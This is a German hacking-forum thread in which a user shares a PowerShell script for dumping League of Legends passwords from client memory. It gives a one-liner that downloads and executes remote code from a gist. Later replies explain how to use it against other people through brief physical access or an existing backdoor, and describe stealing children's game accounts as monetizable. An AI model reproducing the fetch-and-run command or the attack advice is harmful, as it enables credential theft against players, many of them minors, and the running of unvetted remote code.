Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[Powershell](Beta-Client) Lol-Passwort aus dem Memory dumpen

- - - - -

  • Bitte melde dich an um zu Antworten
4 Antworten in diesem Thema

#1
o0o

o0o

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    27
  • 33 Beiträge
  • 15 Bedankt

Please Login HERE or Register HERE to see this link!

 

Im Gegensatz zu meinem Script für den alten Client scheint dieses deutlich zuverlässiger zu funktionieren.

Sollte sich nichts groß mehr an der Architektur und insbesondere der Art und Weise wie der Chat funktioniert (das AIR_<passwort> ist nämlich für die Anmeldung an dem XMPP-Server) ändern, sollte es auch in der Zukunft und wenn der neue Client den alten ersetzt funktionieren.

 

Letztlich habe ich es aber kaum testen können.

 

Entweder lokal speichern und mit .\extract-alpha.ps1 ausführen, oder einfach in eine Powershell pasten: 

iex (iwr https://gist.githubusercontent.com/Numbers11/af7aee87e6e6b121b59e03f4515fdd84/raw/4ba210d51d123d4b7cab9b5edf983b8989f910c1/extract-alpha.ps1)

<3 is all you need


#2
Silent0wn3r

Silent0wn3r

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    2
  • 24 Beiträge
  • 1 Bedankt
  • Android
  • Windows, Linux

funzt bei mir mit Powershell nicht

 

edit: funktioniert...allerdings nur nachdem man sich einmal eingeloggt hat.. verstehe dann aber nicht, was das bringt O.O


Bearbeitet von Silent0wn3r, 23 November 2016 - 20:49 Uhr.


#3
o0o

o0o

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    27
  • 33 Beiträge
  • 15 Bedankt

Wie soll es denn auch funktionieren, wenn das Passwort noch nicht eingegeben ist? :P 
Lol speichert das Passwort ja nicht lokal.

Aus dem Memory dumpen ist halt eine Möglichkeit an das Passwort zu kommen, neben keyloggen, sniffen und das Programm selber zu backdooren und wahrscheinlich die, die am schwierigsten zu detecten ist.


<3 is all you need


#4
Silent0wn3r

Silent0wn3r

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    2
  • 24 Beiträge
  • 1 Bedankt
  • Android
  • Windows, Linux

Aber wie sollte ich das Programm denn nutzen um an fremde Passwörter zu kommen.... die Ausführung des Dumps müsste ja warten, bis das Opfer das Passwort eingegeben hat.. wie willst du das dann ausführen und übermitteln lassen... ^^



#5
o0o

o0o

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    27
  • 33 Beiträge
  • 15 Bedankt

1. Falls man (kurzfristig) physischen Zugriff auf den Computer hat auf dem jemand eingeloggt ist

2. Falls man bereits eine Backdoor installiert hat und das Script in eine Textdatei piped. Das Ganze im Hintergrund laufen zu lassen und zu warten, bis der User sich einloggt wäre jetzt auch keine Kunst.

 

Mir ist schon klar, dass das hier nur ein kleines Geschreibsel und keine fertige Rundumlösung ist, aber sie zeigt jedem der das Skript liest wie es geht und welche Patterns man suchen muss.

 

Und Lol ist ein sehr beliebtes Spiel, das Millionen von Kindern spielen, welche in der derzeitigen Generation es völlig normal finden ihr Taschengeld für ein paar Texturen und Partikeleffekte rauszuhauen und den Accounts damit Wert verleihen. Die Accs abziehen ist also durchaus monetisierbar.


<3 is all you need




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 45 user(s)


    3eyes, Cear, classics, CyberFlash, daredevil_hellfire207, Framerater, gutzuu, hacke2010, Headliner, hitman56, hlaus777, hupfumme, hupfumme, Jackdaniels, kiwitone, lindna, loginman1, mettbrot, MrZitrus, nong_dan, o0o, ObbedCoder, pablo12, PadX18, Payload, peppi200, pi^2, Rogerlopensio, Seldos, shado7, Shadowgun, shiznith, Sickless, Silent0wn3r, smc2014, SonicBoom, Sultan361, TheLoneWolf, Toskom4n, twixeis, w0tan, xVirtu, xxas, Zerobyte, zrty
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.